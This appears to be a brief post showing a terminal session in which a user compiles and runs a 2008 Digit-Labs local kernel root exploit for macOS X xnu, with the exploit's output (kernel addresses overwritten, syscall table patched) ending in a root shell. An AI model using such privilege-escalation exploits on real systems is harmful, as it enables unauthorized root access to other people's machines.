MacOSX too!
imac-de-fernando-quintero:~ fernandoquintero$ nano exp.c
imac-de-fernando-quintero:~ fernandoquintero$ gcc -o exp exp.c
imac-de-fernando-quintero:~ fernandoquintero$ mv exp xnu-hfs-fcntl-v2
imac-de-fernando-quintero:~ fernandoquintero$ nano exp.sh
imac-de-fernando-quintero:~ fernandoquintero$ sh exp.sh
-en Apple MACOS X xnu <= 1228.x local kernel root exploit by:
http://www.digit-labs.org/ -- Digit-Labs 2008!@
-n * creating diskimage...
done
-n * attaching/mounting diskimage...
done
-e * executing exploit...
Apple MACOS X xnu <= 1228.x local kernel root exploit by:
http://www.digit-labs.org/ -- Digit-Labs 2008!@$!
* getattrlist...done
** attrlist length: 36
** fndrinfo:
* done
* setattrlist...done
* overwriting @0x0050770C
* done
* setattrlist...done
* overwriting @0x00507998
** sysent[21].sy_call: 0x0050770C
* done
* jumping...done
* getuid(): 0
+Wh00t
bash-3.2# id
uid=0(root) gid=0(wheel) egid=20(staff) groups=0(wheel),1(daemon),2(kmem),8(procview),29(certusers),3(sys),9(procmod),102(com.apple.sharepoint.group.2),101(com.apple.sharepoint.group.1),4(tty),103(com.apple.sharepoint.group.3),5(operator),80(admin),20(staff)
bash-3.2#
And to exit? A decent exploit:
bash-3.2# touch file
bash-3.2# ls -la file
-rw-r--r-- 1 root staff 0 May 17 23:43 file
bash-3.2# exit
exit
-n * detaching/unmounting diskimage...
done
imac-de-fernando-quintero:~ fernandoquintero$
LOL